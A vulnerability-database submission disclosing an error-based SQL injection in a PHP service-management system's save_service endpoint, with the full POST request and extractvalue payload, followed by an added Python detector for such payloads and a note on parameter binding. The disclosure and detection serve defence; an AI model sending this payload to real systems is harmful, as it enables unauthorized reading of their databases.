Submit #149466: Service Provider Management System SQL Injection

Title: Service Provider Management System SQL Injection

Description: Service Provider Management System is a content management system implemented in PHP and MySQL. The system has an error-based SQL injection vulnerability. For security reasons, I only tested reading the database name, using the attack vector 1111'and/**/extractvalue(1,concat(char(126),(select database())))and' with the relative URL **/classes/Master.php?f=save_service** via the POST method. The full request packet is shown below:

```
POST /classes/Master.php?f=save_service HTTP/1.1
Host: test1.io
Content-Length: 645
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6MLktzFeN9gO8Lzp
Origin: http://test1.io
Referer: http://test1.io/admin/?page=services/manage_service
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close

------WebKitFormBoundary6MLktzFeN9gO8Lzp
Content-Disposition: form-data; name="id"


------WebKitFormBoundary6MLktzFeN9gO8Lzp
Content-Disposition: form-data; name="name"

1111'and/**/extractvalue(1,concat(char(126),(select database())))and'
------WebKitFormBoundary6MLktzFeN9gO8Lzp
Content-Disposition: form-data; name="description"

<p>123456</p>
------WebKitFormBoundary6MLktzFeN9gO8Lzp
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary6MLktzFeN9gO8Lzp
Content-Disposition: form-data; name="status"

1
------WebKitFormBoundary6MLktzFeN9gO8Lzp--
```

Where test1.io is my own test environment website. The response contains the execution value of the database() function in MySQL, which causes the SQL injection vulnerability.

http://cdn.polowong.top/image-20230427193041378.png

For validation, I checked the database name in my own environment:

http://cdn.polowong.top/image-20230427193216985.png

The result is the same as the one obtained by exploiting the SQL injection vulnerability.
Source: https://www.sourcecodester.com/download-code?nid=16501&title=Service+Provider+Management+System+using+PHP+and+MySQL+Source+Code+Free+Download
User: polowong (UID 45828)
Submission: 27.04.2023 13:34 (3 years ago)
Moderation: 27.04.2023 15:38 (2 hours later)
Status: Accepted
VulDB Entry: 227587 [SourceCodester Service Provider Management System 1.0 HTTP POST Request Master.php?f=save_service Name SQL Injection]
Points: 17
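
For triage of web logs or captured traffic, the following added example (not part of the submission or of the affected project) parses a multipart/form-data body like the one quoted in the description and reports which form fields combine a quote break, a MySQL XML error function, and a subquery. The function names, the pattern list and the shortened sample body are assumptions made for this illustration.

```python
import re
from email import message_from_bytes

# MySQL XML functions used for error-based extraction; extractvalue is the one on this page.
ERROR_FUNCS = re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I)
SUBQUERY = re.compile(r"\(\s*select\b", re.I)
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def form_fields(content_type, body):
    """Parse a multipart/form-data body into {field name: text value}."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = message_from_bytes(raw)
    if not msg.is_multipart():
        return {}
    fields = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        value = part.get_payload(decode=True) or b""
        fields[name] = value.decode("utf-8", "replace").strip()
    return fields

def suspicious_fields(content_type, body):
    """Return names of fields that pair a quote break with an error-based subquery."""
    hits = []
    for name, value in form_fields(content_type, body).items():
        norm = INLINE_COMMENT.sub(" ", value)  # /**/ stands in for whitespace
        if "'" in norm and ERROR_FUNCS.search(norm) and SUBQUERY.search(norm):
            hits.append(name)
    return hits

# Constructed sample: a reduced form of the request body quoted in the submission.
SAMPLE_CT = "multipart/form-data; boundary=XBOUNDARY"
SAMPLE_BODY = (
    b"--XBOUNDARY\r\n"
    b'Content-Disposition: form-data; name="id"\r\n\r\n\r\n'
    b"--XBOUNDARY\r\n"
    b'Content-Disposition: form-data; name="name"\r\n\r\n'
    b"1111'and/**/extractvalue(1,concat(char(126),(select database())))and'\r\n"
    b"--XBOUNDARY\r\n"
    b'Content-Disposition: form-data; name="description"\r\n\r\n'
    b"<p>123456</p>\r\n"
    b"--XBOUNDARY--\r\n"
)

if __name__ == "__main__":
    print(suspicious_fields(SAMPLE_CT, SAMPLE_BODY))
```

Pattern matching of this kind only helps find past or ongoing attempts; the endpoint itself is fixed by binding the `name` field as a query parameter instead of concatenating it into the SQL statement.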
